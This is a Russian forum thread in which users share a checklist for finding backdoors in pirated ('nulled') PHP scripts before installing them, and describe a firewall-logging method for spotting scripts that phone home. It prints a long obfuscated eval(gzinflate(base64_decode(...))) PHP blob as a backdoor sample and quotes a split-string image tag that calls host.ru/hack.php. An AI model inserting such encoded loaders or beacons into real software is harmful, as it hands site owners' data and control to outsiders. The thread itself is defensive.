О нулённых скриптах, и BackDoor`ах!

Статус
В этой теме нельзя размещать новые ответы.

sesharim

Знаток
Регистрация
3 Окт 2006
Сообщения
299
Реакции
29
вот возник вопрос, на что надо обращать внимание первым делом?
как выглядят backdoor`ы?
в особенности полезным будет вопрос для новичков, что-бы проблем потом не возникало у них ;)
 
вот возник вопрос, на что надо обращать внимание первым делом?
как выглядят backdoor`ы?
в особенности полезным будет вопрос для новичков, что-бы проблем потом не возникало у них ;)

Для просмотра ссылки Войди или Зарегистрируйся
Тырим vb_3.5.4 & нуллим его :) by REALiSTiC
 
2bes555 Бекдоры это как раз то что оставляют в скрипте хистрые нуллеры/разработчики.
Либо же кто то по ошибке..

Для всех..
Все релизы советую проверять прогой реплейсером.. массовым.. Которая будет искать по коду всех файлов то что вы ввели..

Всё делать надо ДО инсталляции скрипта!!:
1 - Проверяйте файлы на содержание в нём base64. Если есть зашифрованные части кода - расшифруйте их. Это может быть бекдор.
Шифруют в соновном через просто base64.
Либо же в виде:
PHP:
<? eval(gzinflate(base64_decode('
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'))); ?>

2 - Проверьте код на mail функцию, не отправляет ли скрипт что то лишние на левый "email".

3 - Проверьте скрипт на наличие в шаблонах дизайна и админки левых картинок, тоесть которые подгружаются с других сайтов.. Это могут быть как стучалки разрабам, так и сниферы(с их помощью легко потерять пароли и доступ к своим данным).. :) К тому же скрытыми могут быть и просто iframe с троянами.

4 - Обязательно сканьте скачанное антивирусом! Он найдёт не очень серьёзных вирей и некоторые бекдоры.

5 - Поищите в архиве файлы с необычными для скриптов расширениями, ясно что серьёзных вирей в виде exe файла не кидают, но это может вам помочь.

6 - Просмотрите файлы уплоадеры, ht*асесы, другие конфигурационные файлы, чтобы в них небыла разрешена загрузка програмных файлов, или не было установлено выполнение файлов .jpg(и любого другого расширения) в php. :)
========================

И если вы хотите использовать скрипт вообще по возможности посмотрите его код, и используйте мозги. ;)

Люди для вас стараются.
Но нуллеры есть как хорошие, так и не очень. Так же есть те кто просто "недосмотрел"..
Делая то что я написал, вы сможете обезопасить себя от части недобросовестных людей.
Ну и от просто невнимательных нуллеров. :-]

И помните, если кто и виноват что вам чтолибо сломали, либо вы хватнули виря - в этом виноваты больше вы.
Ведь немного подумая этого можно было и избежать..
 
А как быть к примеру с
PHP:
echo "<im"."g sr"."c=ht"."tp".":"."//"."hos"."t.ru"."/hack".".php";

Качать установленный CMS/скрипт качалкой (teleport pro итд) и проверять уже в html'e?
 
Ну я же писал.. применять и включать МОЗГ. :)

Ясно что не от всего можно защититься.
Но основное я назвал.. далее всё зависит от техники.. :)
 
может темку прикрепить и закрыть?
полезно всё-же...
 
Думаю темка будет полезнее в разделе обсуждения. :)
 
Упс. я ещё и темкой ошибся :)
тогда лучше перенести её :)
 
примерный рецепт быстрого определения простых стучалок:
1) поднимаем виртуальную машину
2) ставим испытуемый софт
3) в любимом фаерволе отрубаем доступ во внешний мир и включаем логирование
4) прогоняем софт
5) читаем логи фаервола, куда были попытки выхода
6) по данным из пункта 5 пытаемся искать в коде источники неприятностей

метод не универсальный, так точка отправная точка.
 
По каким функциям лучше искать шеллы, ведь тот кто их оставляет явно называть файл именем imshell.php не будет?
Понимаю что антивири видят некоторые шеллы, типа рст, но таких шеллов куча просто ведь, у меня например антивирь с99 не видит.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху